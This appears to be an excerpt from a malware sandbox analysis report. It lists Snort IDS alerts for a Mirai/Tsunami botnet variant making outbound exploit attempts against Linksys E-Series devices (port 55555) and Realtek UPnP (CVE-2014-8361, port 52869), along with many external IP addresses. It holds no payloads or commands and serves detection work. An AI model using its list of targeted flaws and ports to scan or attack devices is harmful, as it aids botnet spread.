    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37282 -> 88.226.220.156:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39984 -> 172.65.20.200:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41564 -> 172.245.25.8:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40466 -> 172.245.107.236:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51794 -> 184.175.126.56:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57032 -> 156.226.100.41:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43310 -> 172.65.132.196:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50236 -> 172.65.211.64:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55214 -> 172.245.196.210:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58910 -> 95.44.136.168:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49816 -> 156.226.83.133:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43746 -> 156.244.77.144:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36288 -> 95.77.11.18:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46070 -> 172.65.227.132:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39002 -> 172.65.167.14:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56196 -> 172.65.190.190:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59362 -> 172.65.2.221:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33628 -> 172.65.41.239:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48008 -> 172.65.66.149:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57028 -> 172.65.76.183:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40780 -> 156.245.55.125:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45610 -> 156.254.85.23:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54350 -> 156.250.83.86:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59140 -> 172.65.46.1:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33586 -> 88.22.77.19:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44468 -> 95.158.153.184:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54540 -> 95.170.142.91:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56298 -> 88.221.247.46:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56332 -> 88.221.247.46:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47194 -> 172.65.203.91:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36406 -> 184.105.8.37:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42706 -> 95.91.29.213:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47588 -> 95.57.137.245:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43136 -> 95.59.181.200:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60194 -> 172.65.214.15:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42844 -> 172.65.64.98:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46626 -> 172.245.103.96:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37580 -> 172.65.244.183:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53544 -> 95.100.77.49:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46066 -> 88.150.188.185:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58494 -> 95.100.10.27:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39518 -> 88.151.50.21:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44500 -> 172.65.147.21:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33602 -> 172.65.190.182:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52418 -> 172.245.58.78:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54498 -> 98.159.33.227:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33006 -> 88.221.137.238:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32984 -> 88.221.138.147:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37924 -> 88.218.95.110:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48722 -> 95.216.247.240:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59114 -> 95.216.87.153:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37732 -> 95.86.206.240:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40324 -> 95.142.39.190:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40332 -> 95.142.39.190:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49400 -> 156.250.92.81:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60754 -> 172.65.111.104:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55570 -> 88.209.80.208:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52034 -> 95.101.188.42:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42964 -> 156.247.21.129:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59942 -> 88.250.175.208:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36654 -> 88.34.183.106:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52616 -> 95.168.168.168:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38340 -> 88.99.250.96:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46380 -> 95.72.28.184:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39706 -> 156.244.78.201:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46454 -> 172.65.182.94:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57084 -> 172.65.75.62:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58292 -> 95.101.69.250:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54734 -> 88.99.101.202:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37606 -> 95.216.50.138:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52404 -> 95.217.177.216:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50394 -> 95.52.241.27:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55328 -> 156.244.73.248:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58244 -> 88.53.121.223:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40964 -> 88.215.16.244:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38860 -> 156.254.70.117:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41800 -> 172.65.196.122:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60806 -> 172.65.91.115:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46380 -> 172.65.69.150:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34996 -> 172.65.199.227:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46694 -> 156.245.59.234:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59630 -> 88.99.27.29:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42384 -> 95.56.213.156:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41406 -> 156.226.94.189:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43836 -> 172.65.50.231:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39362 -> 172.65.57.85:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48858 -> 88.160.72.151:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35236 -> 95.94.67.15:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44936 -> 172.65.175.160:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56044 -> 172.65.243.174:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35410 -> 172.65.187.28:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41548 -> 95.143.49.238:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45362 -> 95.110.236.22:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44640 -> 88.150.171.72:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59674 -> 95.65.25.23:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54724 -> 95.130.227.219:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48772 -> 88.151.115.26:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50606 -> 95.216.236.178:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54422 -> 95.96.2.18:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38578 -> 172.65.230.26:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54966 -> 172.65.1.109:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36496 -> 172.65.201.180:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33432 -> 172.65.228.156:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60502 -> 172.65.246.67:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52510 -> 95.100.228.240:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40758 -> 172.65.166.22:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50504 -> 172.65.167.212:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56740 -> 172.65.200.192:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54704 -> 95.46.155.189:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50344 -> 88.208.209.13:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60206 -> 88.198.176.127:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39792 -> 197.44.95.233:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38586 -> 88.193.184.68:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53630 -> 88.221.227.180:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50276 -> 88.247.120.102:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40666 -> 156.250.126.150:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46640 -> 95.128.74.80:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45628 -> 95.216.51.242:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51808 -> 95.213.15.31:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41168 -> 95.183.37.140:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42002 -> 88.221.155.49:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38702 -> 156.244.102.115:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49714 -> 88.147.251.78:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54210 -> 88.151.120.239:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54218 -> 88.151.120.239:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48970 -> 156.254.51.133:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58010 -> 88.79.138.160:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53718 -> 88.116.145.172:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41166 -> 88.129.188.92:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40052 -> 95.216.113.235:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45906 -> 172.65.48.26:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45034 -> 172.65.79.233:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52384 -> 172.65.35.55:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53724 -> 95.181.22.158:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60562 -> 88.99.106.220:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40834 -> 95.101.179.218:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39408 -> 95.211.221.121:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40078 -> 95.101.251.46:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50102 -> 95.100.207.121:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54256 -> 88.151.120.239:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40702 -> 95.217.139.189:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44716 -> 95.65.48.22:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43498 -> 95.183.15.221:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54354 -> 88.151.120.239:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49974 -> 95.111.227.220:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37548 -> 95.211.48.234:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39366 -> 88.99.32.231:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38416 -> 95.180.146.25:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33898 -> 88.217.172.164:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53512 -> 88.218.158.143:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58280 -> 88.221.18.135:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57028 -> 88.221.35.81:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54648 -> 88.151.120.239:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51564 -> 95.180.146.93:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57834 -> 95.87.1.22:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44178 -> 95.84.209.124:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38664 -> 88.198.82.136:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33644 -> 88.99.170.45:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35332 -> 95.211.210.93:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34224 -> 88.99.0.56:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46540 -> 88.148.137.222:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59292 -> 88.87.90.248:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53168 -> 88.99.138.240:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44674 -> 88.147.126.189:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59808 -> 88.248.100.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60464 -> 95.216.27.106:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46476 -> 88.221.241.166:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52836 -> 95.183.38.118:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38106 -> 95.216.241.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36770 -> 95.56.213.80:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58592 -> 95.216.140.243:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54084 -> 88.83.120.54:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40620 -> 88.135.148.195:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48768 -> 95.211.109.39:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37118 -> 88.99.6.153:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35130 -> 95.216.49.245:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48534 -> 95.100.222.34:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59422 -> 88.31.6.113:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48314 -> 88.221.156.35:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48210 -> 95.101.58.59:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55062 -> 95.73.184.98:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42760 -> 88.10.175.42:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44708 -> 88.99.145.75:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45324 -> 88.218.156.214:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59020 -> 88.255.170.17:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45164 -> 88.12.181.235:80
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42408 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44978 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40066 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37208 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46324 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55300 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44186 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42266 -> 55555
